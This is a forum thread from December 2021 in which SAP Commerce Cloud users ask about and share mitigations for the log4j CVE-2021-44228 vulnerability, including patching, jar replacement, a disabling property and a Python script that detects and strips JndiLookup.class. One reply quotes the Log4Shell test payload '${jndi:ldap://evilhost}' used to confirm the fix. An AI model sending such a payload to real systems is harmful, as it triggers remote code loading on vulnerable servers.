on 2021 Dec 11 8:22 PM
Hello,
We are using several versions of SAP Commerce Cloud, and we would like to know if we are vulnerable to the discovered vulnerability in log4j (CVE-2021-44228)? If so, which versions?
Kind regards,
Yassine
SAP has released multiple notes:
SAP has published a PDF available here (comment author added this on 2021-12-15)
Update (2021-12-20)
SAP has issued patched releases for supported versions (≥ 1905) of SAP Commerce Cloud. On at least SAP Note 3130939, SAP has indicated another resolution path which involves patching to the most recent patch version of SAP Commerce Cloud (for example, 1905.36, 2105.5).
Hi Adam,
I can confirm that the workaround for Commerce Public Cloud provided by SAP is working.
I added the logic to one of the extension's buildcallbacks.xml, so the affected log4j class will be removed inside of the log4j-core.jar file during build (Replacing OOTB Files)
According to the build release log file, I see the output logging of successful patching:
In addition, the class "JndiLookup" is not available anymore on classpath (checking with HAC):
I also cannot reproduce the JNDI lookup vulnerability when sending/attacking with "${jndi:ldap://evilhost}" requests.
Version: Commerce Cloud System 1905.35
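An added check for the two steps in this reply (confirming JndiLookup is no longer shipped in a jar, and stripping that class from a copy of log4j-core.jar the way the buildcallbacks.xml patch does); this is example code, not SAP's workaround, and the jar it scans is a constructed stand-in built in a temp directory:

```python
import os
import tempfile
import zipfile

# The class that performs the JNDI lookup; the workaround above deletes it from log4j-core.jar.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def build_sample_jar(path):
    """Constructed stand-in for log4j-core.jar (entries hold dummy bytes, not real bytecode)."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        jar.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")
        jar.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class", b"\xca\xfe\xba\xbe")
    return path

def has_jndi_lookup(jar_path):
    """Detection check: does this jar still ship JndiLookup.class?"""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_ENTRY in jar.namelist()

def scan_directory(root):
    """Walk a libs directory and list every jar that still contains JndiLookup."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.endswith(".jar") and has_jndi_lookup(full):
                hits.append(full)
    return sorted(hits)

def strip_jndi_lookup(src, dst):
    """Mitigation: copy src to dst without JndiLookup.class; returns the number of entries dropped."""
    dropped = 0
    with zipfile.ZipFile(src) as jin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as jout:
        for info in jin.infolist():
            if info.filename == JNDI_LOOKUP_ENTRY:
                dropped += 1
                continue
            jout.writestr(info, jin.read(info.filename))
    return dropped

def demo():
    """Build the constructed jar, check it, patch it, re-check; returns (True, 1, False, 1)."""
    workdir = tempfile.mkdtemp()
    src = build_sample_jar(os.path.join(workdir, "log4j-core-sample.jar"))
    dst = os.path.join(workdir, "log4j-core-sample-patched.jar")
    before = has_jndi_lookup(src)
    dropped = strip_jndi_lookup(src, dst)
    return before, dropped, has_jndi_lookup(dst), len(scan_directory(workdir))
```

Point scan_directory at the platform's libs folder after a build to confirm only the patched jar remains; the final tuple element is 1 here because the unpatched original is left in place on purpose.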
The link in the Description of the KBA is broken. Click on the Attachments tab and download the XML from there, pranavbhartia1.
Hi, everyone,
I would like to briefly share my experiences.
I am also very sure that SAP Commerce (on Premise) is affected by this problem.
We currently manage 2 shop instances in our project. On Saturday our customer asked us to do a hotfix deployment and replace the libraries with v2.15.
We used a macro in the buildcallbacks.xml, which deletes the obsolete libraries. Via ant customize we then copy the new versions to "/platform/ext/core/libs".
Alternatively, you can manually unzip the Commerce Installation Package, exchange the libraries and zip again.
I hope I could help a bit. Hopefully, SAP will provide official patches soon.
Many greetings
Torsten
Hi Torsten,
We tried to upgrade with a new version in /platform/ext/core/libs, but after replacing the below jars with the 2.15 version, we don't see any logs getting created other than error logs. Since the platform uses the log4j-1.2.17 jar and the 2.9.1 version, upgrading the api, core, and slf4j only to 2.15 is not working, and the log4j-1.2.17 updated version is no longer available. Let me know if you are able to resolve it and the steps you followed for the same.
log4j-api-2.9.0.jar
log4j-core-2.9.0.jar
log4j-slf4j-impl-2.9.0.jar
Best,
Pankaj
Hi pachoudhary,
we only replaced the jars with v2.X.
We also needed to adapt the log4j properties. In our "local.properties" there was, for "tomcat.generaloptions", an entry like "-Dlog4j.configuration=log4j_init_tomcat.properties". This configuration file did not exist. We needed to remove it; then logging was working well. I don't know where this configuration entry comes from, but log4j < v2.15 did not have any problems with it.
Our real configuration file is given by the property "log4j2.config.xml=..." in "local.properties".
Maybe this can help you.
Best regards.
Hi torsten-mittag
We did follow the above steps; however, we got an error.
We are on on-prem hybris 6.3 and we are using Java 8.
We believe this is due to some compatibility issues with Java 9/tomcat versions.
Can you let us know what Java/Tomcat versions you were using in the SAP Commerce suite when you did the steps mentioned above?
I appreciate your help.
Regards,
Bharadwaj
Hi bsridh,
we are using SAP Commerce 2005 (on Prem), Tomcat 8.5 and the SAP JDK:
openjdk 11.0.13 2021-10-18 LTS
OpenJDK Runtime Environment SapMachine (build 11.0.13+8-LTS-sapmachine)
OpenJDK 64-Bit Server VM SapMachine (build 11.0.13+8-LTS-sapmachine, mixed mode)
Unfortunately, I have no experience with lower versions. In some other projects of my company SAP Commerce 1808 and above is used, and they updated Log4j in the same way.
Best regards,
Torsten
torsten-mittag - Thank you very much! I really appreciate your quick response, and your answer is very helpful.
bsridh - Please refer the SAP's document on their Support Trust Center Portal https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025...
They have released an official KBA article for On-Prem here https://launchpad.support.sap.com/#/notes/3130967
You can take a look and follow the steps as recommended by SAP.
Hi Yassine,
I am fairly sure that Commerce is affected by this too. As only SAP can update external dependencies in the platform, we have to use the other mitigation measure:
Disable the JNDI lookup by setting the following property in the property file:
log4j2.formatMsgNoLookups=true
This can also be done without a deployment as described here:
My tests so far were performed on a local environment (Commerce version 2011.13 / log4j-core-2.13.3) only. They also didn't cover anything beyond the platform, meaning I don't know what needs to be done regarding Solr, which seems to be affected by the vulnerability too.
Good luck everyone!
Felix
It is for SAP Cloud; whether it is also applicable for on-premise, I don't know.
Sorry,